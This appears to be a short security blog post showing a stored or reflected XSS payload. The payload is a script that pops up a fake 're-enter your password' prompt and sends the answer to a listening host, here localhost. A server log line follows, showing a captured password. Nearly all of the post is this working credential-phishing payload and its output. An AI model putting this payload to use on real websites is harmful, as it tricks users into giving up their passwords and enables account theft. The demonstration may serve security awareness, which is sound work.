Maybe some people would fall for something like this, as a stored or reflected XSS:
<script>new Image().src = "http://localhost/?pass=" + encodeURIComponent(prompt("Please re-enter your password", ""))</script>
127.0.0.1 - - [31/Aug/2016:12:46:39 -0400] "GET /?pass=adminpass HTTP/1.1" 302 -
No comments:
Post a Comment